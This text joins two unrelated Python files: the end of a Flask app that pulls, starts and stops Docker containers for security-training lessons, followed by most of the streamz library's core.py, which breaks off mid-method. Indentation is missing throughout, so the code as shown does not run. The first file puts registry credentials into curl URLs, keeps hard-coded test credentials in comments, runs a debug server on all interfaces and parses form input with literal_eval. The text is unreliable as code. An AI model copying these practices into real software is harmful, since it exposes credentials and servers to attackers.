cmd=['curl','https://'+reguser+':'+regpas+'@'+registry+'/v2/_catalog']
out1, out2 = executer(cmd)
temp = {'index':{},'lesns':{},'comps':{},'dld':dld,'dld_lsn':dld_lsn}
try:
images= ast.literal_eval(out1.splitlines()[0])['repositories']
for image in images:
#check if description for component exist and add it to temp
#cmd=['curl','http://test:user@registry.cs.uno.edu/'+image.replace('/','-')]
cmd=['curl','http://'+reguser+':'+regpas+'@'+registry+'/'+image.replace('/','-')]
out1, out2 = executer(cmd)
desc=out1.splitlines()
if desc[0]!='<html>' and desc[0]!='':
temp['comps'][image]=[desc[0],'\n'.join(desc[1:])]
#check if description for lesson exist and add it to temp, if absent
image=image.split('/')[0]
try:
if temp['lesns'][image]:
pass
except:
#cmd=['curl','http://test:user@registry.cs.uno.edu/'+image]
cmd=['curl','http://'+reguser+':'+regpas+'@'+registry+'/'+image]
out1, out2 = executer(cmd)
desc=out1.splitlines()
if desc[0]!='<html>' and desc[0]!='':
temp['lesns'][image]=[desc[0],'\n'.join(desc[1:])]
#check if index for lesson exist and add to temp, if absent
try:
if temp['index'][image]:
pass
except:
#cmd=['curl','http://test:user@registry.cs.uno.edu/'+image+'_index']
cmd=['curl','http://'+reguser+':'+regpas+'@'+registry+'/'+image+'_index']
out1, out2 = executer(cmd)
desc=out1.splitlines()[0]
if desc!='<html>' and desc!='':
temp['index'][image]=desc
else:
temp['lesns'][image]=['n/a','n/a']
else:
temp['comps'][image]=['n/a','n/a']
except:
print "some error in getting repo data"
result = temp
print result
flask.flash(result)
return flask.render_template('repo.html')
@login_required
def post(self):
global dld_lsn
global loc
global registry,regmail,reguser,regpas
flag = 0
#login to the registry server
#cmd = ['docker','login','-u','test','-p','user','--email="unotest3@gmail.com"','https://registry.cs.uno.edu']
cmd = ['docker','login','-u',reguser,'-p',regpas,'--email="'+regmail+'"','https://'+registry]
out1,out2=executer(cmd)
try:
request = flask.request.form['lesn']
request = ast.literal_eval(request)
lesn = request[0]
cont = request[1]
#info = cont['comps'][image]
flag = 1
except:
request = flask.request.form['comp']
request = ast.literal_eval(request)
image = request[0]
cont = request[1]
info = cont['comps'][image]
#download just the component image from the registry server in a thread
cmd = ['docker','pull',registry+'/'+image]
t = threading.Thread(name='child procs', target=downloader, args=[cmd,image,info])
t.daemon = True
t.start()
#return to back to web page
return flask.redirect(flask.url_for('repo'))
#add code if lesson is to be saved under a new name
new_lsn = lesn
#add lesson to the download list for lessons
dld_lsn.append(lesn)
#print lesn,'\n', cont
new_cont = []
for comp in cont['index'][lesn].split()[1:]:
print "loop main",comp
image1 = comp.replace(lesn,new_lsn)
image = image1.replace('-','/')
new_cont.append(image1)
#download image from the registry server in a thread
cmd = ['docker','pull',registry+'/'+image]
info = cont['comps'][image]
t = threading.Thread(name='child procs', target=downloader, args=[cmd,image,info])
t.daemon = True
t.start()
#get description from POST and other attributes required for the lesson
desc = cont['lesns'][lesn]
line = new_lsn+' '+' '.join(new_cont)
index = new_cont
t = threading.Thread(name='child procs', target=add_lesson, args=[lesn,new_lsn,index,line,desc])
t.daemon = True
t.start()
return flask.redirect(flask.url_for('repo'))
class Home(flask.views.MethodView):
@login_required
def get(self):
global loc
#index2 {'lesson1': {'status': 'Y', 'comps': {'lesson1/comp1': {'status': ['Y'], 'index': ['lesson1/comp1', 'latest', '252f198a8beb', 'ago 380MB', 'Y', []], 'desc': ['Web Server', 'LAMP server hosting a PHP webpage.']}}, 'desc': ['SQL Injection to Shell II', 'This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then once in the administration console, how you can run commands on the system. ']}}
#check if all files are available
filechecker()
#---------------------------------
#check for status of containers
cmd = ['docker', 'ps', '-a']
out1, out2 = executer(cmd)
index3={}
index4=[]
tag = ""
if out1:
temp2=[]
temp3=[]
flag=0
for line in out1.splitlines():
if 'lesson' in line:
var1=line.split()
if var1[var1.index('ago')+1] == 'Up':
index3[var1[-1]]=[var1[1],'Y']
else:
index3[var1[-1]]=[var1[1],'S']
index4.append(var1[-1])
print "Home",index3,index4
index1={}
temp2=[]
#check downloaded images
cmd = ['docker', 'images']
out1, out2 = executer(cmd)
for line in out1.splitlines():
temp3 = []
flags = []
temp = line.split()
if line.startswith('lesson'):
status=''
#555 history command no longer gives you image id of intermediate containers
cmd = ["docker","history","--no-trunc",temp[0]]
temp2=executer(cmd)
image = []
flags = 0
for step in temp2[0].splitlines():
if '"@STEP@' in step:
step = step.split()
image = step[0][0:3]
temp1=[]
try:
temp1=index3[temp[0].replace('/','-')]
if image == temp1[0] :
#print temp1
flags=temp1[1]
else:
temp1=['','']
except:
temp1=['','']
temp3.append([image,temp1[1],' '.join(step[step.index('"@STEP@')+1:-2])[:-1]])
if image:
temp[2]=image
if not flags:
try:
flags=index3[temp[0].replace('/','-')][1]
except:
flags='N'
index1[temp[0]]=[temp[0],temp[1],temp[2],' '.join(temp[-2:]),flags,temp3[::-1]]
print "index",index1
temp=[]
index2={}
fname=loc+'static/configs/lesson.txt'
with open(fname) as f:
temp=f.read().splitlines()
for item in temp:
count1 = count2 = 0
item = item.split()
index2[item[0]]={}
if True:
#check files and add the lesson title and description
try:
fbuf=[]
fname=loc+'static/lessons/'+item[0]
with open(fname) as f:
fbuf=f.read().splitlines()
index2[item[0]]['desc']=[fbuf[0],''.join(fbuf[1:])]
except:
index2[item[0]]['desc']=['','']
index2[item[0]]['comps']={}
index2[item[0]]['status']=''
#print item,index2
for key in item[1:]:
#check files and add the component title and description
print "--",key
try:
fbuf=[]
fname='static/lessons/'+key
with open(fname) as f:
fbuf=f.read().splitlines()
comp_desc = [fbuf[0],''.join(fbuf[1:])]
except:
comp_desc = ['','']
ip = 'n/a'
try:
temp3=index1[key.replace('-','/')]
if temp3[4]=='Y':
cmd = ['docker','inspect','--format','{{ .NetworkSettings.IPAddress}}',key]
ip,err = executer(cmd)
ip = ip.rstrip()
count1+=1
elif temp3[4]=='N':
count2+=1
except:
temp3=[]
index2[item[0]]['comps'][key.replace('-','/')]={'index':temp3,'desc':comp_desc,'status':[temp3[4]],'network':[ip]}
#print key,comp_desc,temp3
#print index2
print item[1:],count1,count2
if count1 == len(item[1:]):
index2[item[0]]['status']='Y'
elif count2 == len(item[1:]) :
index2[item[0]]['status']='N'
else:
index2[item[0]]['status']='S'
#print "new"
#print index3
#print index1
print "index2",index2
flask.flash(index2,'lesson')
return flask.render_template('home.html')
@login_required
def post(self):
request = flask.request.form
result = {}
temp1 = []
temp2 = []
print request
try:
if request['start-all']:
print request['start-all']
try:
temp=ast.literal_eval(request['start-all'])
targets=temp.keys()
except:
pass
print targets
for cont in targets:
image = temp[cont]['index'][2]
print "starting container ",cont,image
cmd = ['docker', 'run', '-Pitd', '--name='+cont.replace('/','-'), image]
out1, out2 = executer(cmd)
print "out-",cont,out2
except:
try:
if request['stop-all']:
try:
temp=ast.literal_eval(request['stop-all'])
request=temp.keys()
except:
request=[request['stop-all']]
print "stop all containers ",request
for cont in request:
cont = cont.replace('/','-')
print "stopping container "+cont
cmd = ['docker', 'stop', cont]
out1, out2 = executer(cmd)
except:
try:
if request['reset-all']:
try:
conts = ast.literal_eval(request['reset-all'])
targets = conts.keys()
except:
targets = [request['reset-all']]
for cont in targets:
print "resetting container ",cont
try:
cmd = ['docker','rm','-f', cont.replace('/','-')]
out1, out2 = executer(cmd)
except:
pass
except :
try:
if request['jump']:
request = ast.literal_eval(request['jump'])
key = request.keys()[0]
target = request[key][0]
print key,target
try:
cmd = ['docker', 'rm','-f',key.replace('/','-')]
out1, out2 = executer(cmd)
print cmd
cmd = ['docker', 'run','-itd','-P','--name='+key.replace('/','-'),target]
print cmd
out1, out2 = executer(cmd)
except:
print "error in jump - \n",out2
except:
try:
if request['restart-all']:
vals=[]
try:
conts = ast.literal_eval(request['restart-all'])
targets = conts.keys()
except:
targets = [request['restart-all']]
for cont in targets:
print "restarting container ",cont
try:
cmd = ['docker','restart', cont.replace('/','-')]
out1, out2 = executer(cmd)
except:
print "error restarting",cont
except:
try:
if request['connect']:
temp=ast.literal_eval(request['connect'])
conts=temp[0].replace('/','-')
title=temp[0].split('-')[0]+' '+temp[1]
print "connect to container "+conts,title
try:
cmd='docker attach '+conts
subprocess.Popen(['xterm','-T',title,'-e',cmd])
except:
print "error at xterm"
except:
e = sys.exc_info()[0]
print "Exception", e
return flask.redirect(flask.url_for('home'))
class Custom(flask.views.MethodView):
@login_required
def get(self):
print "asd"
@login_required
def post(self):
print "asd"
app.add_url_rule('/',
view_func=Main.as_view('index'),
methods=["GET", "POST"])
app.add_url_rule('/home/',
view_func=Home.as_view('home'),
methods=['GET', 'POST'])
app.add_url_rule('/repo/',
view_func=Repo.as_view('repo'),
methods=['GET', 'POST'])
app.debug = True
app.run(host='0.0.0.0')
|
core.py
|
from __future__ import absolute_import, division, print_function
from collections import deque, defaultdict
from datetime import timedelta
import functools
import logging
import six
import sys
import threading
from time import time
import weakref
import toolz
from tornado import gen
from tornado.locks import Condition
from tornado.ioloop import IOLoop
from tornado.queues import Queue
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from collections.abc import Iterable
from .compatibility import get_thread_identity
from .orderedweakset import OrderedWeakrefSet
no_default = '--no-default--'
_global_sinks = set()
_html_update_streams = set()
thread_state = threading.local()
logger = logging.getLogger(__name__)
_io_loops = []
def get_io_loop(asynchronous=None):
if asynchronous:
return IOLoop.current()
if not _io_loops:
loop = IOLoop()
thread = threading.Thread(target=loop.start)
thread.daemon = True
thread.start()
_io_loops.append(loop)
return _io_loops[-1]
def identity(x):
return x
class RefCounter:
""" A counter to track references to data
This class is used to track how many nodes in the DAG are referencing
a particular element in the pipeline. When the count reaches zero,
then parties interested in knowing if data is done being processed are
notified
Parameters
----------
initial: int, optional
The initial value of the reference counter
cb: callable
        The function to call when the reference count reaches zero
loop: tornado.ioloop.IOLoop
The loop on which to create a callback when the reference count
reaches zero
"""
def __init__(self, initial=0, cb=None, loop=None):
self.loop = loop if loop else get_io_loop()
self.count = initial
self.cb = cb
def retain(self, n=1):
"""Retain the reference
Parameters
----------
n: The number of times to retain the reference
"""
self.count += n
def release(self, n=1):
"""Release the reference
        If the reference count is equal to or less than zero, the callback,
        if provided, will be added to the provided loop or the default loop
Parameters
----------
n: The number of references to release
"""
self.count -= n
if self.count <= 0 and self.cb:
self.loop.add_callback(self.cb)
def __str__(self):
return '<RefCounter count={}>'.format(self.count)
__repr__ = __str__
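# A small sketch of RefCounter semantics (assumes a running IOLoop as created
# by get_io_loop above): the callback is scheduled on the loop once the count
# drops to zero, so it fires asynchronously rather than inline.
#
#   done = []
#   counter = RefCounter(initial=2, cb=lambda: done.append(True))
#   counter.release()   # count == 1, callback not scheduled yet
#   counter.release()   # count == 0, cb scheduled on the IOLoop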
class Stream(object):
""" A Stream is an infinite sequence of data.
Streams subscribe to each other passing and transforming data between them.
A Stream object listens for updates from upstream, reacts to these updates,
and then emits more data to flow downstream to all Stream objects that
subscribe to it. Downstream Stream objects may connect at any point of a
Stream graph to get a full view of the data coming off of that point to do
with as they will.
Parameters
----------
stream_name: str or None
This is the name of the stream.
asynchronous: boolean or None
Whether or not this stream will be used in asynchronous functions or
normal Python functions. Leave as None if you don't know.
True will cause operations like emit to return awaitable Futures
False will use an Event loop in another thread (starts it if necessary)
ensure_io_loop: boolean
Ensure that some IOLoop will be created. If asynchronous is None or
False then this will be in a separate thread, otherwise it will be
IOLoop.current
Examples
--------
>>> def inc(x):
... return x + 1
>>> source = Stream() # Create a stream object
>>> s = source.map(inc).map(str) # Subscribe to make new streams
>>> s.sink(print) # take an action whenever an element reaches the end
>>> L = list()
>>> s.sink(L.append) # or take multiple actions (streams can branch)
>>> for i in range(5):
... source.emit(i) # push data in at the source
'1'
'2'
'3'
'4'
'5'
>>> L # and the actions happen at the sinks
['1', '2', '3', '4', '5']
"""
_graphviz_shape = 'ellipse'
_graphviz_style = 'rounded,filled'
_graphviz_fillcolor = 'white'
_graphviz_orientation = 0
str_list = ['func', 'predicate', 'n', 'interval']
def __init__(self, upstream=None, upstreams=None, stream_name=None,
loop=None, asynchronous=None, ensure_io_loop=False):
self.downstreams = OrderedWeakrefSet()
if upstreams is not None:
self.upstreams = list(upstreams)
else:
self.upstreams = [upstream]
self._set_asynchronous(asynchronous)
self._set_loop(loop)
if ensure_io_loop and not self.loop:
self._set_asynchronous(False)
if self.loop is None and self.asynchronous is not None:
self._set_loop(get_io_loop(self.asynchronous))
for upstream in self.upstreams:
if upstream:
upstream.downstreams.add(self)
self.name = stream_name
def _set_loop(self, loop):
self.loop = None
if loop is not None:
self._inform_loop(loop)
else:
for upstream in self.upstreams:
if upstream and upstream.loop:
self.loop = upstream.loop
break
def _inform_loop(self, loop):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.loop is not None:
if self.loop is not loop:
raise ValueError("Two different event loops active")
else:
self.loop = loop
for upstream in self.upstreams:
if upstream:
upstream._inform_loop(loop)
for downstream in self.downstreams:
if downstream:
downstream._inform_loop(loop)
def _set_asynchronous(self, asynchronous):
self.asynchronous = None
if asynchronous is not None:
self._inform_asynchronous(asynchronous)
else:
for upstream in self.upstreams:
if upstream and upstream.asynchronous:
self.asynchronous = upstream.asynchronous
break
def _inform_asynchronous(self, asynchronous):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.asynchronous is not None:
if self.asynchronous is not asynchronous:
raise ValueError("Stream has both asynchronous and synchronous elements")
else:
self.asynchronous = asynchronous
for upstream in self.upstreams:
if upstream:
upstream._inform_asynchronous(asynchronous)
for downstream in self.downstreams:
if downstream:
downstream._inform_asynchronous(asynchronous)
def _add_upstream(self, upstream):
"""Add upstream to current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
if self.upstreams == [None]:
self.upstreams[0] = upstream
else:
self.upstreams.append(upstream)
def _add_downstream(self, downstream):
"""Add downstream to current downstreams"""
self.downstreams.add(downstream)
def _remove_downstream(self, downstream):
"""Remove downstream from current downstreams"""
self.downstreams.remove(downstream)
def _remove_upstream(self, upstream):
"""Remove upstream from current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
if len(self.upstreams) == 1:
            self.upstreams[0] = None
else:
self.upstreams.remove(upstream)
@classmethod
def register_api(cls, modifier=identity, attribute_name=None):
""" Add callable to Stream API
This allows you to register a new method onto this class. You can use
it as a decorator.::
>>> @Stream.register_api()
... class foo(Stream):
... ...
>>> Stream().foo(...) # this works now
It attaches the callable as a normal attribute to the class object. In
doing so it respects inheritance (all subclasses of Stream will also
get the foo attribute).
By default callables are assumed to be instance methods. If you like
you can include modifiers to apply before attaching to the class as in
the following case where we construct a ``staticmethod``.
>>> @Stream.register_api(staticmethod)
... class foo(Stream):
... ...
>>> Stream.foo(...) # Foo operates as a static method
You can also provide an optional ``attribute_name`` argument to control
the name of the attribute your callable will be attached as.
>>> @Stream.register_api(attribute_name="bar")
... class foo(Stream):
... ...
        >>> Stream().bar(...)  # foo was actually attached as bar
"""
def _(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
return func(*args, **kwargs)
name = attribute_name if attribute_name else func.__name__
setattr(cls, name, modifier(wrapped))
return func
return _
@classmethod
def register_plugin_entry_point(cls, entry_point, modifier=identity):
if hasattr(cls, entry_point.name):
raise ValueError(
f"Can't add {entry_point.name} from {entry_point.module_name} "
f"to {cls.__name__}: duplicate method name."
)
def stub(*args, **kwargs):
""" Entrypoints-based streamz plugin. Will be loaded on first call. """
node = entry_point.load()
if not issubclass(node, Stream):
raise TypeError(
f"Error loading {entry_point.name} "
f"from module {entry_point.module_name}: "
f"{node.__class__.__name__} must be a subclass of Stream"
)
if getattr(cls, entry_point.name).__name__ == "stub":
cls.register_api(
modifier=modifier, attribute_name=entry_point.name
)(node)
return node(*args, **kwargs)
cls.register_api(modifier=modifier, attribute_name=entry_point.name)(stub)
def start(self):
""" Start any upstream sources """
for upstream in self.upstreams:
upstream.start()
def __str__(self):
s_list = []
if self.name:
s_list.append('{}; {}'.format(self.name, self.__class__.__name__))
else:
s_list.append(self.__class__.__name__)
for m in self.str_list:
s = ''
at = getattr(self, m, None)
if at:
if not callable(at):
s = str(at)
elif hasattr(at, '__name__'):
s = getattr(self, m).__name__
elif hasattr(at.__class__, '__name__'):
s = getattr(self, m).__class__.__name__
else:
s = None
if s:
s_list.append('{}={}'.format(m, s))
if len(s_list) <= 2:
s_list = [term.split('=')[-1] for term in s_list]
text = "<"
text += s_list[0]
if len(s_list) > 1:
text += ': '
text += ', '.join(s_list[1:])
text += '>'
return text
__repr__ = __str__
def _ipython_display_(self, **kwargs): # pragma: no cover
try:
from ipywidgets import Output
from IPython.core.interactiveshell import InteractiveShell
except ImportError:
if hasattr(self, '_repr_html_'):
return self._repr_html_()
else:
return self.__repr__()
output = Output(_view_count=0)
output_ref = weakref.ref(output)
def update_cell(val):
output = output_ref()
if output is None:
return
with output:
content, *_ = InteractiveShell.instance().display_formatter.format(val)
output.outputs = ({'output_type': 'display_data',
'data': content,
'metadata': {}},)
s = self.map(update_cell)
_html_update_streams.add(s)
self.output_ref = output_ref
s_ref = weakref.ref(s)
def remove_stream(change):
output = output_ref()
if output is None:
return
if output._view_count == 0:
ss = s_ref()
ss.destroy()
_html_update_streams.remove(ss) # trigger gc
output.observe(remove_stream, '_view_count')
return output._ipython_display_(**kwargs)
def _emit(self, x, metadata=None):
"""
Push data into the stream at this point
Parameters
----------
x: any
an element of data
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
if metadata:
self._retain_refs(metadata, len(self.downstreams))
else:
metadata = []
result = []
for downstream in list(self.downstreams):
r = downstream.update(x, who=self, metadata=metadata)
if type(r) is list:
result.extend(r)
else:
result.append(r)
self._release_refs(metadata)
return [element for element in result if element is not None]
def emit(self, x, asynchronous=False, metadata=None):
""" Push data into the stream at this point
This is typically done only at source Streams but can theoretically be
done at any point
Parameters
----------
x: any
an element of data
asynchronous:
emit asynchronously
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
ts_async = getattr(thread_state, 'asynchronous', False)
if self.loop is None or asynchronous or self.asynchronous or ts_async:
if not ts_async:
thread_state.asynchronous = True
try:
result = self._emit(x, metadata=metadata)
if self.loop:
return gen.convert_yielded(result)
finally:
thread_state.asynchronous = ts_async
else:
@gen.coroutine
def _():
thread_state.asynchronous = True
try:
result = yield self._emit(x, metadata=metadata)
finally:
del thread_state.asynchronous
raise gen.Return(result)
sync(self.loop, _)
def update(self, x, who=None, metadata=None):
self._emit(x, metadata=metadata)
def gather(self):
""" This is a no-op for core streamz
This allows gather to be used in both dask and core streams
"""
return self
def connect(self, downstream):
""" Connect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to connect to
"""
self._add_downstream(downstream)
downstream._add_upstream(self)
def disconnect(self, downstream):
""" Disconnect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to disconnect from
"""
self._remove_downstream(downstream)
downstream._remove_upstream(self)
@property
def upstream(self):
if len(self.upstreams) != 1:
raise ValueError("Stream has multiple upstreams")
else:
return self.upstreams[0]
def destroy(self, streams=None):
"""
Disconnect this stream from any upstream sources
"""
if streams is None:
streams = self.upstreams
for upstream in list(streams):
upstream.downstreams.remove(self)
self.upstreams.remove(upstream)
def scatter(self, **kwargs):
from .dask import scatter
return scatter(self, **kwargs)
def remove(self, predicate):
""" Only pass through elements for which the predicate returns False """
return self.filter(lambda x: not predicate(x))
@property
def scan(self):
return self.accumulate
@property
def concat(self):
return self.flatten
def sink_to_list(self):
""" Append all elements of a stream to a list as they come in
Examples
--------
>>> source = Stream()
>>> L = source.map(lambda x: 10 * x).sink_to_list()
>>> for i in range(5):
... source.emit(i)
>>> L
[0, 10, 20, 30, 40]
"""
L = []
self.sink(L.append)
return L
def frequencies(self, **kwargs):
""" Count occurrences of elements """
def update_frequencies(last, x):
return toolz.assoc(last, x, last.get(x, 0) + 1)
return self.scan(update_frequencies, start={}, **kwargs)
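    # A doctest-style sketch for frequencies (it wraps the scan/accumulate
    # machinery; accumulate is registered elsewhere in this module):
    #
    #   >>> source = Stream()
    #   >>> L = source.frequencies().sink_to_list()
    #   >>> for x in ['a', 'b', 'a']:
    #   ...     source.emit(x)
    #   >>> L[-1]
    #   {'a': 2, 'b': 1}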
def visualize(self, filename='mystream.png', **kwargs):
"""Render the computation of this object's task graph using graphviz.
Requires ``graphviz`` and ``networkx`` to be installed.
Parameters
----------
filename : str, optional
The name of the file to write to disk.
kwargs:
Graph attributes to pass to graphviz like ``rankdir="LR"``
"""
from .graph import visualize
return visualize(self, filename, **kwargs)
def to_dataframe(self, example):
""" Convert a stream of Pandas dataframes to a DataFrame
Examples
--------
>>> source = Stream()
>>> sdf = source.to_dataframe()
>>> L = sdf.groupby(sdf.x).y.mean().stream.sink_to_list()
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
"""
from .dataframe import DataFrame
return DataFrame(stream=self, example=example)
def to_batch(self, **kwargs):
""" Convert a stream of lists to a Batch
All elements of the stream are assumed to be lists or tuples
Examples
--------
>>> source = Stream()
>>> batches = source.to_batch()
>>> L = batches.pluck('value').map(inc).sum().stream.sink_to_list()
>>> source.emit([{'name': 'Alice', 'value': 1},
... {'name': 'Bob', 'value': 2},
... {'name': 'Charlie', 'value': 3}])
>>> source.emit([{'name': 'Alice', 'value': 4},
... {'name': 'Bob', 'value': 5},
... {'name': 'Charlie', 'value': 6}])
"""
from .batch import Batch
return Batch(stream=self, **kwargs)
def _retain_refs(self, metadata, n=1):
""" Retain all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to retain the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].retain(n)
def _release_refs(self, metadata, n=1):
""" Release all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to release the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].release(n)
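# A minimal end-to-end sketch composing the operators registered below
# (map, filter, sink_to_list), in the same doctest style as the per-class
# docstrings:
#
# >>> source = Stream()
# >>> L = source.map(lambda x: 2 * x).filter(lambda x: x > 4).sink_to_list()
# >>> for i in range(5):
# ...     source.emit(i)
# >>> L
# [6, 8]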
@Stream.register_api()
class sink(Stream):
""" Apply a function on every element
Examples
--------
>>> source = Stream()
>>> L = list()
>>> source.sink(L.append)
>>> source.sink(print)
>>> source.sink(print)
>>> source.emit(123)
123
123
>>> L
[123]
See Also
--------
map
Stream.sink_to_list
"""
_graphviz_shape = 'trapezium'
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# take the stream specific kwargs out
stream_name = kwargs.pop("stream_name", None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
_global_sinks.add(self)
def update(self, x, who=None, metadata=None):
result = self.func(x, *self.args, **self.kwargs)
if gen.isawaitable(result):
return result
else:
return []
@Stream.register_api()
class map(Stream):
""" Apply a function to every element in the stream
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.map(lambda x: 2*x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
try:
result = self.func(x, *self.args, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class starmap(Stream):
""" Apply a function to every element in the stream, splayed out
See ``itertools.starmap``
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.starmap(lambda a, b: a + b).sink(print)
>>> for i in range(5):
... source.emit((i, i))
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
y = x + self.args
try:
result = self.func(*y, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
def _truthy(x):
return not not x
@Stream.register_api()
class filter(Stream):
""" Only pass through elements that satisfy the predicate
Parameters
----------
predicate : function
The predicate. Should return True or False, where
True means that the predicate is satisfied.
*args :
The arguments to pass to the predicate.
**kwargs:
Keyword arguments to pass to predicate
Examples
--------
>>> source = Stream()
>>> source.filter(lambda x: x % 2 == 0).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
"""
def __init__(self, upstream, predicate, *args, **kwargs):
if predicate is None:
predicate = _truthy
self.predicate = predicate
stream_name = kwargs.pop("stream_name", None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.predicate(x, *self.args, **self.kwargs):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class accumulate(Stream):
""" Accumulate results with previous state
This performs running or cumulative reductions, applying the function
to the previous total and the new element. The function should take
two arguments, the previous accumulated state and the next element and
it should return a new accumulated state:
- ``state = func(previous_state, new_value)`` (returns_state=False)
- ``state, result = func(previous_state, new_value)`` (returns_state=True)
where the new state is passed to the next invocation. The state or the
result, respectively, is emitted downstream for the two cases.
Parameters
----------
func: callable
start: object
Initial value, passed as the value of ``previous_state`` on the first
invocation. Defaults to the first submitted element
returns_state: boolean
If true then func should return both the state and the value to emit
If false then both values are the same, and func returns one value
**kwargs:
Keyword arguments to pass to func
Examples
--------
A running total, producing triangular numbers
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
1
3
6
10
A count of number of events (including the current one)
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + 1, start=0).sink(print)
>>> for _ in range(5):
... source.emit(0)
1
2
3
4
5
Like the builtin "enumerate".
>>> source = Stream()
>>> source.accumulate(lambda acc, x: ((acc[0] + 1, x), (acc[0], x)),
... start=(0, 0), returns_state=True
... ).sink(print)
>>> for i in range(3):
... source.emit(0)
(0, 0)
(1, 0)
(2, 0)
"""
_graphviz_shape = 'box'
def __init__(self, upstream, func, start=no_default, returns_state=False,
**kwargs):
self.func = func
self.kwargs = kwargs
self.state = start
self.returns_state = returns_state
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.with_state = kwargs.pop('with_state', False)
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.state is no_default:
self.state = x
if self.with_state:
return self._emit((self.state, x), metadata=metadata)
else:
return self._emit(x, metadata=metadata)
else:
try:
result = self.func(self.state, x, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
if self.returns_state:
state, result = result
else:
state = result
self.state = state
if self.with_state:
return self._emit((self.state, result), metadata=metadata)
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class slice(Stream):
"""
Get only some events in a stream by position. Works like list[] syntax.
Parameters
----------
start : int
First event to use. If None, start from the beginning
end : int
Last event to use (non-inclusive). If None, continue without stopping.
Does not support negative indexing.
step : int
Pass on every Nth event. If None, pass every one.
Examples
--------
>>> source = Stream()
>>> source.slice(2, 6, 2).sink(print)
>>> for i in range(5):
... source.emit(i)
2
4
"""
def __init__(self, upstream, start=None, end=None, step=None, **kwargs):
self.state = 0
self.start = start or 0
self.end = end
self.step = step or 1
if any((_ or 0) < 0 for _ in [start, end, step]):
raise ValueError("Negative indices not supported by slice")
stream_name = kwargs.pop('stream_name', None)
Stream.__init__(self, upstream, stream_name=stream_name)
self._check_end()
def update(self, x, who=None, metadata=None):
if self.state >= self.start and (self.state - self.start) % self.step == 0:
self.emit(x, metadata=metadata)
self.state += 1
self._check_end()
def _check_end(self):
if self.end and self.state >= self.end:
# we're done
for upstream in self.upstreams:
upstream._remove_downstream(self)
@Stream.register_api()
class partition(Stream):
""" Partition stream into tuples of equal size
Parameters
----------
n: int
Maximum partition size
timeout: int or float, optional
Number of seconds after which a partition will be emitted,
even if its size is less than ``n``. If ``None`` (default),
a partition will be emitted only when its size reaches ``n``.
key: hashable or callable, optional
Emit items with the same key together as a separate partition.
If ``key`` is callable, partition will be identified by ``key(x)``,
otherwise by ``x[key]``. Defaults to ``None``.
Examples
--------
>>> source = Stream()
>>> source.partition(3).sink(print)
>>> for i in range(10):
... source.emit(i)
(0, 1, 2)
(3, 4, 5)
(6, 7, 8)
>>> source = Stream()
>>> source.partition(2, key=lambda x: x % 2).sink(print)
>>> for i in range(4):
... source.emit(i)
(0, 2)
(1, 3)
>>> from time import sleep
>>> source = Stream()
>>> source.partition(5, timeout=1).sink(print)
>>> for i in range(3):
... source.emit(i)
>>> sleep(1)
(0, 1, 2)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, timeout=None, key=None, **kwargs):
self.n = n
self._timeout = timeout
self._key = key
self._buffer = defaultdict(lambda: [])
self._metadata_buffer = defaultdict(lambda: [])
self._callbacks = {}
Stream.__init__(self, upstream, ensure_io_loop=True, **kwargs)
def _get_key(self, x):
if self._key is None:
return None
if callable(self._key):
return self._key(x)
return x[self._key]
@gen.coroutine
def _flush(self, key):
result, self._buffer[key] = self._buffer[key], []
